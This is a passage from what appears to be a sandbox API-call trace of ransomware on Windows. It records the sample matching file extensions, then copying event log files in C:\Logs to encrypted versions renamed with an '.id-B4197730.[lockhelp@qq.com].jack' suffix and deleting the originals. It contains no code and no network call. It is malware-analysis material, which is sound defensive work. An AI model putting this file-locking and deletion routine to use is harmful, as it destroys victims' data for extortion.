[0210.849] lstrlenW (lpString=".pdf") returned 4 [0210.849] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".xls") returned 4 [0210.849] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".xlsx") returned 5 [0210.849] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.849] lstrlenW (lpString=".ppt") returned 4 [0210.850] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.850] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.850] lstrlenW (lpString=".zip") returned 4 [0210.850] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.850] lstrlenW (lpString=".rar") returned 4 [0210.850] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.850] lstrlenW (lpString=".bz2") returned 4 [0210.850] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.850] lstrlenW (lpString=".7z") returned 3 [0210.850] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.850] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.850] lstrlenW (lpString=".dbf") returned 4 [0210.850] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.850] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.850] lstrlenW (lpString=".1cd") returned 4 [0210.850] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.850] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.850] lstrlenW (lpString=".jpg") returned 4 [0210.850] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.850] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.850] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4Operational.evtx") returned 46 [0210.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.850] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0210.850] CloseHandle (hObject=0x44c) returned 1 [0210.851] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 0x20 [0210.851] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.851] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.851] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.851] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.851] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0210.851] GetLastError () returned 0x0 [0210.851] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.853] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.855] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.855] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x130, lpOverlapped=0x0) returned 1 [0210.855] SetEndOfFile (hFile=0x450) returned 1 [0210.855] CloseHandle (hObject=0x450) returned 1 [0210.857] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.857] SetEndOfFile (hFile=0x44c) returned 1 [0210.858] CloseHandle (hObject=0x44c) returned 1 [0210.858] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.858] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 1 [0210.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.858] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.858] lstrlenW (lpString=".doc") returned 4 [0210.859] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".docx") returned 5 [0210.859] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.859] lstrlenW (lpString=".pdf") returned 4 [0210.859] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".xls") returned 4 [0210.859] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".xlsx") returned 5 [0210.859] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.859] lstrlenW (lpString=".ppt") returned 4 [0210.859] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.859] lstrlenW (lpString=".zip") returned 4 [0210.859] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".rar") returned 4 [0210.859] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".bz2") returned 4 [0210.859] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".7z") returned 3 [0210.859] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.859] lstrlenW (lpString=".dbf") returned 4 [0210.859] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.859] lstrlenW (lpString=".1cd") returned 4 [0210.859] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.859] lstrlenW (lpString=".jpg") returned 4 [0210.859] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.859] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.859] lstrlenW (lpString=".doc") returned 4 [0210.859] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.859] lstrlenW (lpString=".docx") returned 5 [0210.859] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.859] lstrlenW (lpString=".pdf") returned 4 [0210.860] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString=".xls") returned 4 [0210.860] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString=".xlsx") returned 5 [0210.860] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.860] lstrlenW (lpString=".ppt") returned 4 [0210.860] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.860] lstrlenW (lpString=".zip") returned 4 [0210.860] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString=".rar") returned 4 [0210.860] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString=".bz2") returned 4 [0210.860] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString=".7z") returned 3 [0210.860] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.860] lstrlenW (lpString=".dbf") returned 4 [0210.860] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.860] lstrlenW (lpString=".1cd") returned 4 [0210.860] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0210.860] lstrlenW (lpString=".jpg") returned 4 [0210.860] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.860] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.860] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 46 [0210.860] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.861] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0210.861] CloseHandle (hObject=0x44c) returned 1 [0210.861] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 0x20 [0210.861] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.861] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.861] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.861] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.861] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0210.862] GetLastError () returned 0x0 [0210.862] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.918] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.956] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.956] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x130, lpOverlapped=0x0) returned 1 [0210.956] SetEndOfFile (hFile=0x450) returned 1 [0210.957] CloseHandle (hObject=0x450) returned 1 [0210.959] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.959] SetEndOfFile (hFile=0x44c) returned 1 [0210.966] CloseHandle (hObject=0x44c) returned 1 [0210.966] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.966] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 1 [0210.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString=".doc") returned 4 [0210.967] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".docx") returned 5 [0210.967] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.967] lstrlenW (lpString=".pdf") returned 4 [0210.967] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".xls") returned 4 [0210.967] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".xlsx") returned 5 [0210.967] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.967] lstrlenW (lpString=".ppt") returned 4 [0210.967] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString=".zip") returned 4 [0210.967] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".rar") returned 4 [0210.967] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".bz2") returned 4 [0210.967] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".7z") returned 3 [0210.967] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString=".dbf") returned 4 [0210.967] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString=".1cd") returned 4 [0210.967] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString=".jpg") returned 4 [0210.967] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.967] lstrlenW (lpString=".doc") returned 4 [0210.967] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.967] lstrlenW (lpString=".docx") returned 5 [0210.967] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.968] lstrlenW (lpString=".pdf") returned 4 [0210.968] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString=".xls") returned 4 [0210.968] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString=".xlsx") returned 5 [0210.968] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.968] lstrlenW (lpString=".ppt") returned 4 [0210.968] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.968] lstrlenW (lpString=".zip") returned 4 [0210.968] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString=".rar") returned 4 [0210.968] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString=".bz2") returned 4 [0210.968] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString=".7z") returned 3 [0210.968] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.968] lstrlenW (lpString=".dbf") returned 4 [0210.968] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.968] lstrlenW (lpString=".1cd") returned 4 [0210.968] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0210.968] lstrlenW (lpString=".jpg") returned 4 [0210.968] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.968] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.968] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 46 [0210.968] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.969] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0210.969] CloseHandle (hObject=0x44c) returned 1 [0210.969] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 0x20 [0210.969] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.969] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.969] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.969] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.969] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0214.599] GetLastError () returned 0x0 [0214.599] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0214.850] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0214.852] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0214.852] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x130, lpOverlapped=0x0) returned 1 [0214.852] SetEndOfFile (hFile=0x420) returned 1 [0215.237] CloseHandle (hObject=0x420) returned 1 [0215.239] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.239] SetEndOfFile (hFile=0x44c) returned 1 [0215.252] CloseHandle (hObject=0x44c) returned 1 [0215.252] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.252] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 1 [0215.252] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.252] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.252] lstrlenW (lpString=".doc") returned 4 [0215.252] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.252] lstrlenW (lpString=".docx") returned 5 [0215.252] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.253] lstrlenW (lpString=".pdf") returned 4 [0215.253] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString=".xls") returned 4 [0215.253] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString=".xlsx") returned 5 [0215.253] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.253] lstrlenW (lpString=".ppt") returned 4 [0215.253] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.253] lstrlenW (lpString=".zip") returned 4 [0215.253] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString=".rar") returned 4 [0215.253] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString=".bz2") returned 4 [0215.253] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString=".7z") returned 3 [0215.253] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.253] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.253] lstrlenW (lpString=".dbf") returned 4 [0215.253] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.253] lstrlenW (lpString=".1cd") returned 4 [0215.253] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.253] lstrlenW (lpString=".jpg") returned 4 [0215.253] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.253] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.254] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.254] lstrlenW (lpString=".doc") returned 4 [0215.254] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString=".docx") returned 5 [0215.254] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.254] lstrlenW (lpString=".pdf") returned 4 [0215.254] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString=".xls") returned 4 [0215.254] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString=".xlsx") returned 5 [0215.254] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.254] lstrlenW (lpString=".ppt") returned 4 [0215.254] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.254] lstrlenW (lpString=".zip") returned 4 [0215.254] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString=".rar") returned 4 [0215.254] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString=".bz2") returned 4 [0215.254] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString=".7z") returned 3 [0215.254] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.254] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.254] lstrlenW (lpString=".dbf") returned 4 [0215.254] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.254] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.254] lstrlenW (lpString=".1cd") returned 4 [0215.254] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.255] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0215.255] lstrlenW (lpString=".jpg") returned 4 [0215.255] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.255] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.255] lstrlenW (lpString="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 57 [0215.255] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), 